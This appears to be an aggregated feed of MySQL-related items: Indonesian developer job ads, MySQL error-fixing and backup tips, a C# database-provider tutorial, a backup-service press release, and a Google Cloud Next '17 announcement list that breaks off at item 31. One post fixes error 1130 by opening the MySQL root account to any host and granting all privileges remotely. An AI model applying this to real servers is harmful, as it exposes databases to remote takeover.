Bachelor Degree in Informatics Technology / Information Systems / any related field; experience in a similar position or with an individual project is preferred; fresh graduates are welcome to apply; skills: PHP/CI, MySQL, HTML, JavaScript, OOP; willing to work in Yogyakarta

          Job Vacancy: Web Developer        
Fresh graduates are welcome; familiar with OOP PHP, CodeIgniter, jQuery, Ajax, Bootstrap; MySQL database knowledge will be an advantage; male/female with strong logic and good communication skills in a team

          Comment on InnoDB per-table tablespaces – file for each innodb table by bpelhos        
It works when you:
  • drop the foreign keys of the InnoDB tables
  • alter the InnoDB tables to MyISAM
  • stop the mysql server
  • remove/move the ibdata* and ib_logfile* files
  • start the mysql server (a new ibdata1 file should appear with a 10M filesize)
  • alter the previously altered tables back to InnoDB
  • create the foreign keys removed at the first step
          Job Vacancy: Staff at PT. WINGS SURYA (WINGS GROUP)        

Application deadline: 31 July 2012
Job location: Surabaya (and surrounding areas)

W I N G S  G R O U P

  • D3 / S1 in Accounting
  • Male / Female
  • Minimum GPA 2.9
  • Good attention to detail
  • Willing to be placed outside the city / island (IA positions only)
  • D3 / S1 in Mechanical & Electrical Engineering
  • Male, minimum GPA 2.8
  • Willing to work shifts
  • Willing to be placed at the plant (Gresik & Bangil - Pasuruan)
  • Preferably with roughly 2 years of refinery experience
  • Good work endurance
  • S1 in Informatics Engineering, minimum GPA 2.8
  • Male / Female
  • Proficient in C#, MySQL
  • SAP knowledge is a plus
  • Good work endurance
  • S1 in Graphic Design / Visual Communication Design, minimum GPA 2.8
  • Male / Female
  • Proficient in Adobe Photoshop, Freehand, Adobe Illustrator
  • S1 in Management, minimum GPA 2.8
  • Male, maximum age 30
  • Preferably with roughly 1 year of experience in the field
  • Willing to be assigned outside the city / island
  • Good communication skills
  • Creative and a fast learner
  • S1 in Chemical Engineering / Food Science / Biotechnology, minimum GPA 2.8, male
  • Willing to work shifts
  • Willing to be placed at the plant (Gresik)
  • Good work endurance
  • S1 in Industrial Engineering / Informatics, minimum GPA 2.8, maximum age 28
  • High perseverance
  • Good work endurance
  • Fast learner
  • Factory placement, for PPIC
  • D3 / S1 in Engineering (except Marine Engineering / Physics / Mathematics / Civil)
  • Male, minimum GPA 2.8
  • Willing to work shifts
  • Willing to be placed at the plant (Gresik & Bangil - Pasuruan)
  • S1 in Civil Engineering, minimum GPA 2.8, male
  • Willing to be placed at the plant (Gresik)
  • Good work endurance
  • S1 in Industrial Engineering / Informatics, minimum GPA 3.00
  • High perseverance
  • Good work endurance
  • Enjoys outdoor work
  • Fast learner
  • S1 in Psychology / Communication, minimum GPA 3.0
  • Good communication skills
  • At least passive English
  • People oriented
  • S1 in Law, male / female, minimum GPA 2.8
  • Good communication skills
  • Familiar with Law No. 13 on Manpower
  • Enjoys back-office work and is detail-oriented

Complete application documents can be sent to:
Phone: 031 - 5320250

          Job Vacancy: Software Developer and System Analyst at PT. SEMIS (GIZITAS)        

Application deadline: 7 July 2012 (see info)
Job location: Semarang

PT. SEMIS is a service-oriented company that offers end-to-end Information Technology ( IT ) management and consulting. We provide complete business solutions that leverage industry-standard technologies to establish the competitive advantage of our Customers. Please visit our website at www.ptsemis.com for more information.

we have immediate openings for the following positions :
  • BS/S1 degree or equivalent - preferably in Computer Science / Information Technology, Computer Engineering, Industrial Engineering, Mathematics, Science & Technology or equivalent
  • Fresh graduate applicants are encouraged to apply
  • Good interpersonal and communication skills
  • Highly motivated and willing to work hard
  • Working knowledge of HTML and JavaScript
  • Working knowledge of RDBMS ( Oracle, SQL Server or MySQL )
  • Working knowledge of software development with ASP.NET, VB.NET/C# or ColdFusion/PHP
  • BS/S1 degree or equivalent
  • Fresh graduate applicants are encouraged to apply
  • Good interpersonal and communication skill
  • Highly motivated and willing to work hard
  • Ability to take instruction and requirements in English ( Written / Oral )
  • Has relevant and practical experience in the functional and technical requirements definition and documentation
  • Has relevant and practical experience in System Analysis, Design and Testing
To apply, please submit your current CV, desired position (code) and any supporting documents to :

EMAIL : jobs@ptsemis.com

          Job Vacancy: Full Stack Developer, Cilacap        
Minimum education S1 (Bachelor's degree); maximum age 30; male preferred; proficient in PHP, MySQL, HTML, JavaScript, CSS; familiar with WordPress; able to work under pressure; willing to learn; honest; independent / a problem solver; at least passive English; other supporting skills will be highly valued

          MYSQL: Convert hex string to integer        
So there are a few places on the web asking how to do this; while it’s easy to do SELECT x'1fb5'; if you have the hex string stored in a field you can’t do that. The answer is to use CONV(), i.e. SELECT CONV(myhexfield, 16, 10); It’s that simple.
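Outside MySQL, the same base conversion is easy to sanity-check in Python (the hex string below is the one from the example):

```python
# The value of the hex literal x'1fb5' held as a plain string,
# e.g. as it might come back from a VARCHAR column.
hex_string = "1fb5"

# Equivalent of MySQL's CONV(hex_string, 16, 10): parse base 16, print base 10.
value = int(hex_string, 16)
print(value)  # 8117
```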
          Job Vacancy: IT Web Programmer        
Minimum education S1 in Informatics Engineering; age up to 35; minimum 2 years of experience with PHP, ASP.Net and MySQL; proficient in HTML/CSS, JavaScript, jQuery, Adobe Photoshop; experience with a PHP framework such as Laravel

          Handling ERROR 1049 (42000): Unknown database 'root'        
Command: mysql  -u root -p root -P 8066 -v -S  /opt/app/DataBase/mysql.sock
Error: ERROR 1049 (42000): Unknown database 'root'
Fix: change the password part of the command from "-p root" to "-proot", with no space in between (with the space, mysql treats "root" as a database name).


Posted by 疯狂 on 2013-03-29 11:01

          Handling MySQL error 1130        


Today I was connecting remotely to a MySQL server's database and could not connect no matter what I tried; the error code was 1130: ERROR 1130: Host is not allowed to connect to this MySQL server
My guess was that the remote user lacked connection privileges. Operating on the mysql database as follows solved it: after logging in to mysql on the local machine, change the "host" column of the "user" table in the "mysql" database from "localhost" to '%'.
mysql -u root -p
mysql>use mysql;
mysql>select host from user where user='root';
mysql>update user set host = '%' where user ='root';
mysql>flush privileges;
mysql>select host from user where user='root';



1. This error occurs when connecting to mysql via MySQL-Front or MySQL Administrator:

ERROR 1130: Host ***.***.***.*** is not allowed to connect to this MySQL server


You need to change the host column of the user table in the mysql database.



Syntax: mysql -h host_name -u user_name -p password   (on the local machine, -h and host_name can be omitted)


C:\program files\mysql\mysql server 5.0\bin>mysql -u root -p
Enter password:******
Enter the username with the -p flag to request a password prompt; press Enter, and when "Enter password:" appears, type the password and press Enter. That logs you in.


Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 5.0.1-nt

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.



mysql> \s    show version information
mysql> \q or mysql> quit    exit the mysql database server
mysql> \h or mysql> help    show help (other database server commands)


mysql>use mysql;

mysql>update user set host = '%'   where user ='root';

mysql>flush privileges;

mysql>select host, user from user where user='root';








Modifying MySQL user accounts, error 1130 (2007-09-07 09:18)

A database on a MySQL server needed backing up, so I installed a MySQL GUI tool. I opened the "MySQL Administrator" tool and filled in the username and password, but could not log in; it kept reporting "ERROR 1130: Host 'lijuan-' is not allowed to connect to this MySQL server". Searching online turned up these two solutions:
1. Change the table. Your account may not be allowed to log in remotely, only from localhost. In that case, on the localhost machine, log in to mysql and change the "host" column of the "user" table in the "mysql" database from "localhost" to "%":
mysql -u root -pvmware
mysql>use mysql;
mysql>update user set host = '%' where user = 'root';
mysql>select host, user from user;
2. Grant privileges. For example, if you want myuser to connect to the mysql server from any host using the password mypassword:
GRANT ALL PRIVILEGES ON *.* TO 'myuser'@'%' IDENTIFIED BY 'mypassword' WITH GRANT OPTION; To allow user myuser to connect from the host 192.168.1.3 using mypassword as the password: GRANT ALL PRIVILEGES ON *.* TO 'myuser'@'192.168.1.3' IDENTIFIED BY 'mypassword' WITH GRANT OPTION;      The root user's host in my mysql.user table was indeed localhost. Changing it to "%" by the table method still gave error 1130; granting access "from any host" reported the same error; only after granting access to my own IP did I finally manage to log in.


If client-side error 1045 appears after the above, run the following on the server:

UPDATE user SET Password=PASSWORD('123456') where USER='myuser';

Posted by 疯狂 on 2013-03-29 10:57

          Common commands for MySQL database backup and restore        


mysqldump -hhostname -uusername -ppassword databasename > backupfile.sql


mysqldump --add-drop-table -uusername -ppassword databasename > backupfile.sql


mysqldump -hhostname -uusername -ppassword databasename | gzip > backupfile.sql.gz


mysqldump -hhostname -uusername -ppassword databasename specific_table1 specific_table2 > backupfile.sql


mysqldump -hhostname -uusername -ppassword --databases databasename1 databasename2 databasename3 > multibackupfile.sql


mysqldump --no-data --databases databasename1 databasename2 databasename3 > structurebackupfile.sql


mysqldump --all-databases > allbackupfile.sql


mysql -hhostname -uusername -ppassword databasename < backupfile.sql


gunzip < backupfile.sql.gz | mysql -uusername -ppassword databasename


mysqldump -uusername -ppassword databasename | mysql --host=*.*.*.* -C databasename

Posted by 疯狂 on 2011-09-30 14:29

          Job Vacancy: Web Programmer        
Male/female; S1 Informatics graduate, fresh graduates welcome; prior work experience as a programmer is a plus; proficient in PHP, MySQL, Ajax, CSS, JavaScript; minimum GPA 2.75; framework knowledge preferred; able to work in a team and deliver programs on deadline; honest and responsible; owns a vehicle; placement in the Surabaya area.

          Job Vacancy: Junior Developer        
Bachelor Degree from Computer Science or related fields; a passion for programming in Java / C, HTML, and the Oracle and MySQL databases

          Job Vacancy: Senior Java Developer        
Bachelor Degree from Computer Science or related fields; at least 2 years of recent working experience developing in Java; a passion for programming; at least intermediate programming skill; intermediate analysis experience and skill with the Oracle and MySQL databases; experience ...

          Job Vacancy: IT Web Developer        
Male or female; maximum age 27; unmarried; S1 in Multimedia / Informatics Engineering; minimum 2 years of relevant experience; understands HTML and web protocols; skilled in SQL-based queries with PHP and MySQL, or other flat-file handling through program code and PHP ETL tools ...

          Job Vacancy: API Developer        
Good Python, PHP or Go programming skills; minimum 1 year of experience in the related field; understands RESTful web API development; experience with MySQL, Redis or memcached will be a plus; fresh graduates are welcome but shall have ...

          Job Vacancy: Programmer        
Experienced in programming; proficient in CSS, JavaScript, jQuery, MySQL, PHP; good logic and algorithm skills; familiarity with a PHP framework preferred; male/female; fresh graduates are welcome to apply; maximum age 30; able to work under pressure and deadlines; able to work in a team; ...

          Job Vacancy: Back End Programmer        
Minimum Bachelor Degree in Information Technology or equivalent; 2 years minimum relevant working experience; experienced in HTML, CSS, PHP, MySQL, JavaScript; basic understanding of back-end technologies & platforms, Node.JS in particular; good understanding & proficient knowledge of server-side JavaScript ...

          Linux Backup Utility Provider Grows Market Share        

Phoenix, AZ -- (SBWIRE) -- 08/17/2011 -- Backup Teddy, the industry-leading backup utility for Linux servers, continues to experience tremendous growth. As the easiest backup utility available for webmasters and those running Linux, Backup Teddy provides reliable and easy backups of entire servers for regular users who have little Linux experience. Its famed scheduled backup utility allows users to safely back up important MySQL databases, PHP files, Apache settings, cron jobs, system settings and more within minutes thanks to its proven Linux rsync backup technology.

Even today, 99 percent of existing Linux backup solutions require expert-level skills, which keeps backups a difficult task. Backup Teddy's rsync Linux backup technology simplifies it all while providing the most efficient means of transferring files from one location to another. The technology allows the company to upload only the changed portions of any multi-gigabyte file to its secure servers. That data is then integrated into its main copy of the file, and the local and remote copies are then verified to be 100 percent identical. "We provide the industry's most efficient and fastest way to back up server data, and a typical 5GB backup takes just five minutes as opposed to hours or days with other solutions," said Peter Barkhal, a Backup Teddy security specialist.

All Backup Teddy accounts come with the provider's backup utility software, which enables users to remotely back up important data to the company's secure systems in just a few easy steps. "Our expert developers have designed our Linux Rsync backup utility to be incredibly easy to use and so compatible that virtually all Linux distributions will have a Backup Teddy schedule set and fully operating in under five minutes," noted Peter. "We still happily set up the customer's first server for free if they want."

Customers can install and run Backup Teddy free of charge on multiple servers with no transfer limits and no wasted bandwidth from their web host or Internet provider. The utility has been tested on more than a dozen Linux distributions and works with both 32bit/64bit Linux systems.

When asked if a Windows version of the service was coming out, Peter replied, "I'm not supposed to talk about it, but it's definitely in the works. We will be bringing Backup Teddy to the Microsoft world in a few months, once we're happy it's as robust as its Linux counterpart."

All data at Backup Teddy is protected by military-grade security and more than ample redundancy, with all data encrypted en route to the provider's servers. "Server access is restricted to the company's security staff, which prohibits anyone from seeing what customers are backing up," said Peter. "Users also have the option to encrypt important databases so that only they can personally decrypt them. We just tell them not to lose that special password, because not even we can get it back for them."

While most providers charge upwards of $300 per month for a less reliable Linux backup with fewer features, Backup Teddy impressively does far more for far less. The provider's cost-effective plans become cheaper per gigabyte, and all plans come with a 30-day money-back guarantee with full support provided seven days a week. To obtain more information on Backup Teddy, please visit http://www.BackupTeddy.com.

For more information on this press release visit: http://www.sbwire.com/press-releases/linux/backup/release-104156.htm

Media Relations Contact

Tom Haywarde
Email: Click to Email Tom Haywarde
Web: http://www.BackupTeddy.com

          Lowongan Kerja Web Programmer        
Minimum Diploma (D3) in Information Technology, Information Systems, Computer Science or a related field; fresh graduates are welcome. At least 1 year of experience as an Application Developer on web applications. Good knowledge of PHP, MySQL, JavaScript, PHP web ...

          Lowongan Kerja Junior Programmer        
Degree/Diploma in IT or a related field. Proficiency with HTML5, CSS3, JavaScript, PHP, MySQL. Good interpersonal skills and able to work as part of a team. Able to work under pressure and meet deadlines. Fluent in English, both oral ...

          Lowongan Kerja Web Developer        
Male or female. Maximum age 27. Unmarried. Bachelor's degree (S1) in Multimedia/Informatics Engineering. At least 2 years of relevant experience. Understands HTML and web protocols. Skilled in query-based SQL (PHP, MySQL or others), flat-file handling through program code, ETL tools, PHP ...

          Lowongan Kerja Java Developer         
At least 2 years of experience. Back end: Java/PHP. UI: ExtJS framework/jQuery. DB: familiar with Oracle, PostgreSQL and MySQL queries and stored procedures. Able to build header-detail transaction user interfaces. Familiar with Linux.

          Snow Leopard        
A few days ago, I downloaded an app. The installation failed because it required Snow Leopard. I then realized that Mac OS X 10.6 had been released a while ago, actually a year ago, and thought I should upgrade my MacBook. It worked great as it was, but should I give Snow Leopard a try?

I ordered the DVD and went ahead with the upgrade without checking for reviews. The installation took about one hour. Initially everything seemed OK: the apps I used daily continued to work, though I didn't notice anything better and wasn't even sure I was running Snow Leopard. When I started to use other apps, the troubles kept coming. First Ruby on Rails (ROR) didn't work, then VPN didn't start, and worst of all, the system crashed twice in one day.

I regretted the upgrade when it crashed the second time. Fortunately it didn't take me too long to figure out the root cause and get it fixed. The culprit was Growl. The error showing in Console messages was "attempt to pop an unknown autorelease pool", lots of them, all from Growl. The solution was to update Growl to the latest version, 1.2.

According to http://www.versiontracker.com/dyn/moreinfo/mac/12696&page=2, the VPN client needs a reinstall. Before reinstalling, I uninstalled it with "sudo /usr/local/bin/vpn_uninstall". Somehow the new VPN client window didn't pop up even after the reinstall, so I learned to start it from the command line with "vpnclient connect your_profile". Before I figured out the cause, the problem went away after a few reboots.

The ROR issue was a real pain. The error was a "500 Internal Server Error": "uninitialized constant MysqlCompat::MysqlRes", "/Library/Ruby/Gems/1.8/gems/activesupport-2.3.4/lib/active_support/dependencies.rb:440:in `load_missing_constant'". I uninstalled MySQL and installed the latest 5.1.47 64-bit version. The error changed to "dyld: lazy symbol binding failed: Symbol not found: _mysql_init". There are many posts on ROR forums about fixes, but somehow it took me 2 days to find this excellent post: http://weblog.rubyonrails.org/2009/8/30/upgrading-to-snow-leopard.

Running the following command got ROR working again:

sudo env ARCHFLAGS="-arch x86_64" gem install mysql -- --with-mysql-config=/usr/local/mysql/bin/mysql_config

Lesson learned: search the web for what others have said before installing or upgrading any software, especially before an OS upgrade.
          MySQL Error 1064        
Seeing the following error when adding new records to a MySQL DB:

ERROR 1064 (42000) at line 3: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'read, ...

The SQL command looks like "insert into table1 (user_id, math, writing, read, ...) values (...". Googling this error brings up lots of links to forum discussions. I read a few, but none gave the root cause. Eventually I realized that "read" (a column in table1) is a reserved word in SQL. Once I removed that column, the command executed without problems, and I quickly resolved the issue by renaming the column from 'read' to 'reading'. If you want to keep the column name, there are two choices. One is to quote the column name with backticks ("`"):

insert into table1 (user_id, math, writing, `read`, ...) values (...

If the ANSI_QUOTES SQL mode is enabled (SET sql_mode='ANSI_QUOTES'), identifiers may also be quoted with double quotes. Alternatively, you can prefix the column name with the table name:

insert into table1 (user_id, math, writing, table1.read, ...) values (...

More details can be found in the MySQL 5.0 Reference Manual, sections 8.3 "Reserved Words" and 8.2 "Schema Object Names".
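If you build INSERT statements programmatically, a small helper can backtick-quote every identifier so reserved words like `read` never trigger error 1064. A sketch (the `quote_ident` helper and the column list are illustrative, not from the original post):

```python
def quote_ident(name: str) -> str:
    """Backtick-quote a MySQL identifier, doubling any embedded backticks."""
    return "`" + name.replace("`", "``") + "`"

cols = ["user_id", "math", "writing", "read"]  # "read" is a reserved word
placeholders = ", ".join(["%s"] * len(cols))
sql = "INSERT INTO table1 ({}) VALUES ({})".format(
    ", ".join(quote_ident(c) for c in cols), placeholders)
print(sql)
# INSERT INTO table1 (`user_id`, `math`, `writing`, `read`) VALUES (%s, %s, %s, %s)
```

Quoting every identifier uniformly is harmless for non-reserved names, so there is no need to maintain a list of reserved words.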
          Comment on 「あれ?」と思ったら、確認する。【小さな成長177】 by Shimapoo_jp        
Dear k.sasaki, thank you very much for your comment. I intend to press ahead with server-side security measures. Wanting to harden WordPress security, I recently installed iThemes Security. However, it seems I had not yet fully understood its backup settings, and while I haven't confirmed whether that was the direct cause, MySQL stopped starting this morning and I spent the day dealing with it. I tried everything I found on various sites but could not identify the cause. Since I had taken manual backups, and despite the warning that raising the value can corrupt data, I decided to try innodb_force_recovery, raising it from 1 in order. Even 3 didn't work, and nothing else did either, so my plan was to dump and salvage what I could once it started, but even at 6 it would not start. (To readers who, like me, suddenly could not start MySQL and found their way to this comment: innodb_force_recovery can corrupt your data. Reference: http://dev.mysql.com/doc/refman/5.1/ja/forcing-recovery.html. I cannot take responsibility if your data gets corrupted; run the command at your own risk, and please consider the other possibilities thoroughly before executing it.) Unable to resolve it no matter how much I researched, I decided to uninstall MySQL and reinstall the latest version. The uninstall went fine, but I stumbled on installing the latest version, and that is when the cause finally became clear: the disk had run out of free space. I had never encountered this before, so I never noticed. When I investigated what was using so much space, it turned out the iThemes Security plugin mentioned earlier had taken a huge number of backups over the past week and used it all up. I deleted all the iThemes Security backup files and tried installing MySQL once more; it installed normally, MySQL started and updated, and the site came back to life. This incident was a great lesson. As for the points you wrote about, I will work through them, starting with what I can do. I still cannot concretely picture my site being attacked, but I will watch the access logs carefully for any strange behavior. It is obvious, but I keenly felt that I must become better at monitoring my own system. There is still so much I do not know, but I will keep studying server-side security hardening and putting countermeasures in place.
          DbProviderFactories: Write database agnostic ADO.NET code        

Recently I needed to write a module that needs to connect to a wide range of SQL-DBs, e.g. MySQL, MS SQL, Oracle etc.

Problem: Most providers use their own concrete classes

If you look at the C# example on the MySQL dev page you will see the MySql namespace and classes:

MySql.Data.MySqlClient.MySqlConnection conn;
string myConnectionString;

// host, password and database are placeholders; the original elides them
myConnectionString = "server=localhost;uid=root;pwd=...;database=test;";

try
{
    conn = new MySql.Data.MySqlClient.MySqlConnection();
    conn.ConnectionString = myConnectionString;
    conn.Open();
}
catch (MySql.Data.MySqlClient.MySqlException ex)
{
    Console.WriteLine(ex.Message);
}

The same classes will probably not work for a MS SQL database.

“Solution”: Use the DbProviderFactories

For example, if you install the MySql NuGet package you will also get this little enhancement to your app.config:

    <system.data>
      <DbProviderFactories>
        <remove invariant="MySql.Data.MySqlClient" />
        <add name="MySQL Data Provider" invariant="MySql.Data.MySqlClient" description=".Net Framework Data Provider for MySQL" type="MySql.Data.MySqlClient.MySqlClientFactory, MySql.Data, Version=, Culture=neutral, PublicKeyToken=c5687fc88969c44d" />
      </DbProviderFactories>
    </system.data>

Now we can get a reference to the MySql client via the DbProviderFactories:

using System;
using System.Data;
using System.Data.Common;

namespace DbProviderFactoryStuff
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                Console.WriteLine("All registered DbProviderFactories:");
                var allFactoryClasses = DbProviderFactories.GetFactoryClasses();

                foreach (DataRow row in allFactoryClasses.Rows)
                    Console.WriteLine(row[0] + ": " + row[2]);

                Console.WriteLine("Try to access a MySql DB:");

                DbProviderFactory dbf = DbProviderFactories.GetFactory("MySql.Data.MySqlClient");
                using (DbConnection dbcn = dbf.CreateConnection())
                {
                    dbcn.ConnectionString = "Server=localhost;Database=testdb;Uid=root;Pwd=Pass1word;";
                    dbcn.Open();
                    using (DbCommand dbcmd = dbcn.CreateCommand())
                    {
                        dbcmd.CommandType = CommandType.Text;
                        dbcmd.CommandText = "SHOW TABLES;";

                        // parameters would be created like this:
                        //var foo = dbcmd.CreateParameter();
                        //foo.ParameterName = "...";
                        //foo.Value = "...";

                        using (DbDataReader dbrdr = dbcmd.ExecuteReader())
                        {
                            while (dbrdr.Read())
                                Console.WriteLine(dbrdr[0]);
                        }
                    }
                }
            }
            catch (Exception exc)
            {
                Console.WriteLine(exc.Message);
            }
        }
    }
}



The most important line is this one:

DbProviderFactory dbf = DbProviderFactories.GetFactory("MySql.Data.MySqlClient");

Now with the DbProviderFactory from the MySql client we can access the MySql database without using any MySql-specific classes.

There are a couple of “in-built” db providers registered, like the MS SQL provider or ODBC stuff.

The above code will output something like this:

All registered DbProviderFactories:
Odbc Data Provider: System.Data.Odbc
OleDb Data Provider: System.Data.OleDb
OracleClient Data Provider: System.Data.OracleClient
SqlClient Data Provider: System.Data.SqlClient
Microsoft SQL Server Compact Data Provider 4.0: System.Data.SqlServerCe.4.0
MySQL Data Provider: MySql.Data.MySqlClient

Other solutions

Of course there are other solutions - some OR mappers, like Entity Framework, have a provider model which might also work, but this is a pretty basic approach.

SQL Commands

The tricky bit here is that you need to make sure your SQL commands work on your database - this is not a silver bullet, it just lets you connect to and execute SQL commands against any ‘registered’ database.
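For comparison, Python gets the same database-agnostic shape from a standard driver interface rather than a factory class: every DB-API 2.0 (PEP 249) module exposes the same connect()/cursor()/execute() surface, so a simple lookup table of driver modules plays the role of DbProviderFactories. A sketch (the registry and its "invariant names" are made up for illustration; only the built-in sqlite3 driver is registered here):

```python
import sqlite3

# Hypothetical registry mapping an "invariant name" to a DB-API 2.0 driver
# module; real code might also register pymysql, psycopg2, etc.
_registry = {"sqlite": sqlite3}

def get_factory(invariant_name: str):
    """Look up a DB-API driver module by its registered name."""
    return _registry[invariant_name]

dbapi = get_factory("sqlite")
conn = dbapi.connect(":memory:")   # the connection string is driver-specific
cur = conn.cursor()
cur.execute("SELECT 1 + 1")        # the SQL dialect is still your problem
row = cur.fetchone()
print(row[0])
```

As with DbProviderFactories, the caller never names a driver-specific class, but it still has to send SQL the target database understands.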

The full demo code is also available on GitHub.

Hope this helps.

          100 announcements (!) from Google Cloud Next '17        

San Francisco — What a week! Google Cloud Next ‘17 has come to an end, but really, it’s just the beginning. We welcomed 10,000+ attendees including customers, partners, developers, IT leaders, engineers, press, analysts, cloud enthusiasts (and skeptics). Together we engaged in 3 days of keynotes, 200+ sessions, and 4 invitation-only summits. Hard to believe this was our first show as all of Google Cloud with GCP, G Suite, Chrome, Maps and Education. Thank you to all who were here with us in San Francisco this week, and we hope to see you next year.

If you’re a fan of video highlights, we’ve got you covered. Check out our Day 1 keynote (in less than 4 minutes) and Day 2 keynote (in under 5!).

One of the common refrains from customers and partners throughout the conference was “Wow, you’ve been busy. I can’t believe how many announcements you’ve had at Next!” So we decided to count all the announcements from across Google Cloud and in fact we had 100 (!) announcements this week.

For the list lovers amongst you, we’ve compiled a handy-dandy run-down of our announcements from the past few days:


Google Cloud is excited to welcome two new acquisitions to the Google Cloud family this week, Kaggle and AppBridge.

1. Kaggle - Kaggle is one of the world's largest communities of data scientists and machine learning enthusiasts. Kaggle and Google Cloud will continue to support machine learning training and deployment services in addition to offering the community the ability to store and query large datasets.

2. AppBridge - Google Cloud acquired Vancouver-based AppBridge this week, which helps you migrate data from on-prem file servers into G Suite and Google Drive.


Google Cloud brings a suite of new security features to Google Cloud Platform and G Suite designed to help safeguard your company’s assets and prevent disruption to your business: 

3. Identity-Aware Proxy (IAP) for Google Cloud Platform (Beta) - Identity-Aware Proxy lets you provide access to applications based on risk, rather than using a VPN. It provides secure application access from anywhere, restricts access by user, identity and group, deploys with integrated phishing-resistant Security Key and is easier to set up than end-user VPN.

4. Data Loss Prevention (DLP) for Google Cloud Platform (Beta) - Data Loss Prevention API lets you scan data for 40+ sensitive data types, and is used as part of DLP in Gmail and Drive. You can find and redact sensitive data stored in GCP, invigorate old applications with new sensitive data sensing “smarts” and use predefined detectors as well as customize your own.

5. Key Management Service (KMS) for Google Cloud Platform (GA) - Key Management Service allows you to generate, use, rotate, and destroy symmetric encryption keys for use in the cloud.

6. Security Key Enforcement (SKE) for Google Cloud Platform (GA) - Security Key Enforcement allows you to require security keys be used as the 2-Step verification factor for enhanced anti-phishing security whenever a GCP application is accessed.

7. Vault for Google Drive (GA) - Google Vault is the eDiscovery and archiving solution for G Suite. Vault enables admins to easily manage their G Suite data lifecycle and search, preview and export the G Suite data in their domain. Vault for Drive enables full support for Google Drive content, including Team Drive files.

8. Google-designed security chip, Titan - Google uses Titan to establish hardware root of trust, allowing us to securely identify and authenticate legitimate access at the hardware level. Titan includes a hardware random number generator, performs cryptographic operations in the isolated memory, and has a dedicated secure processor (on-chip).


New GCP data analytics products and services help organizations solve business problems with data, rather than spending time and resources building, integrating and managing the underlying infrastructure:

9. BigQuery Data Transfer Service (Private Beta) - BigQuery Data Transfer Service makes it easy for users to quickly get value from all their Google-managed advertising datasets. With just a few clicks, marketing analysts can schedule data imports from Google Adwords, DoubleClick Campaign Manager, DoubleClick for Publishers and YouTube Content and Channel Owner reports.

10. Cloud Dataprep (Private Beta) - Cloud Dataprep is a new managed data service, built in collaboration with Trifacta, that makes it faster and easier for BigQuery end-users to visually explore and prepare data for analysis without the need for dedicated data engineer resources.

11. New Commercial Datasets - Businesses often look for datasets (public or commercial) outside their organizational boundaries. Commercial datasets offered include financial market data from Xignite, residential real-estate valuations (historical and projected) from HouseCanary, predictions for when a house will go on sale from Remine, historical weather data from AccuWeather, and news archives from Dow Jones, all immediately ready for use in BigQuery (with more to come as new partners join the program).

12. Python for Google Cloud Dataflow in GA - Cloud Dataflow is a fully managed data processing service supporting both batch and stream execution of pipelines. Until recently, these benefits have been available solely to Java developers. Now there’s a Python SDK for Cloud Dataflow in GA.

13. Stackdriver Monitoring for Cloud Dataflow (Beta) - We’ve integrated Cloud Dataflow with Stackdriver Monitoring so that you can access and analyze Cloud Dataflow job metrics and create alerts for specific Dataflow job conditions.

14. Google Cloud Datalab in GA - This interactive data science workflow tool makes it easy to do iterative model and data analysis in a Jupyter notebook-based environment using standard SQL, Python and shell commands.

15. Cloud Dataproc updates - Our fully managed service for running Apache Spark, Flink and Hadoop pipelines now supports restarting failed jobs, including automatic restart as needed (beta), single-node clusters for lightweight sandbox development (beta) and GPUs, while the cloud labels feature, for more flexibility in managing your Dataproc resources, is now GA.


New GCP databases and database features round out a platform on which developers can build great applications across a spectrum of use cases:

16. Cloud SQL for PostgreSQL (Beta) - Cloud SQL for PostgreSQL implements the same design principles currently reflected in Cloud SQL for MySQL, namely, the ability to securely store and connect to your relational data via open standards.

17. Microsoft SQL Server Enterprise (GA) - Available on Google Compute Engine, plus support for Windows Server Failover Clustering (WSFC) and SQL Server AlwaysOn Availability (GA).

18. Cloud SQL for MySQL improvements - Increased performance for demanding workloads via 32-core instances with up to 208GB of RAM, and central management of resources via Identity and Access Management (IAM) controls.

19. Cloud Spanner - Launched a month ago, but still, it would be remiss not to mention it because, hello, it’s Cloud Spanner! The industry’s first horizontally scalable, globally consistent, relational database service.

20. SSD persistent-disk performance improvements - SSD persistent disks now have increased throughput and IOPS performance, which are particularly beneficial for database and analytics workloads. Read these docs for complete details about persistent-disk performance.

21. Federated query on Cloud Bigtable - We’ve extended BigQuery’s reach to query data inside Cloud Bigtable, the NoSQL database service for massive analytic or operational workloads that require low latency and high throughput (particularly common in Financial Services and IoT use cases).


New GCP Cloud Machine Learning services bolster our efforts to make machine learning accessible to organizations of all sizes and sophistication:

22.  Cloud Machine Learning Engine (GA) - Cloud ML Engine, now generally available, is for organizations that want to train and deploy their own models into production in the cloud.

23. Cloud Video Intelligence API (Private Beta) - A first of its kind, Cloud Video Intelligence API lets developers easily search and discover video content by providing information about entities (nouns such as “dog,” “flower”, or “human” or verbs such as “run,” “swim,” or “fly”) inside video content.

24. Cloud Vision API (GA) - Cloud Vision API reaches GA and offers new capabilities for enterprises and partners to classify a more diverse set of images. The API can now recognize millions of entities from Google’s Knowledge Graph and offers enhanced OCR capabilities that can extract text from scans of text-heavy documents such as legal contracts or research papers or books.

25. Machine learning Advanced Solution Lab (ASL) - ASL provides dedicated facilities for our customers to directly collaborate with Google’s machine-learning experts to apply ML to their most pressing challenges.

26. Cloud Jobs API - A powerful aid to job search and discovery, Cloud Jobs API now has new features such as Commute Search, which will return relevant jobs based on desired commute time and preferred mode of transportation.

27. Machine Learning Startup Competition - We announced a Machine Learning Startup Competition in collaboration with venture capital firms Data Collective and Emergence Capital, and with additional support from a16z, Greylock Partners, GV, Kleiner Perkins Caufield & Byers and Sequoia Capital.


New GCP pricing continues our intention to create customer-friendly pricing that’s as smart as our products; and support services that are geared towards meeting our customers where they are:

28. Compute Engine price cuts - Continuing our history of pricing leadership, we’ve cut Google Compute Engine prices by up to 8%.

29. Committed Use Discounts - With Committed Use Discounts, customers can receive a discount of up to 57% off our list price, in exchange for a one or three year purchase commitment paid monthly, with no upfront costs.

30. Free trial extended to 12 months - We’ve extended our free trial from 60 days to 12 months, allowing you to use your $300 credit across all GCP services and APIs, at your own pace and schedule. Plus, we’ve introduced new Always Free products -- non-expiring usage limits that you can use to test and develop applications at no cost. Visit the Google Cloud Platform Free Tier page for details.

31. Engineering Support - Our new Engineering Support offering is a role-based subscription model that allows us to match engineer to engineer, to meet you where your business is, no matter what stage of development you’re in. It has 3 tiers:

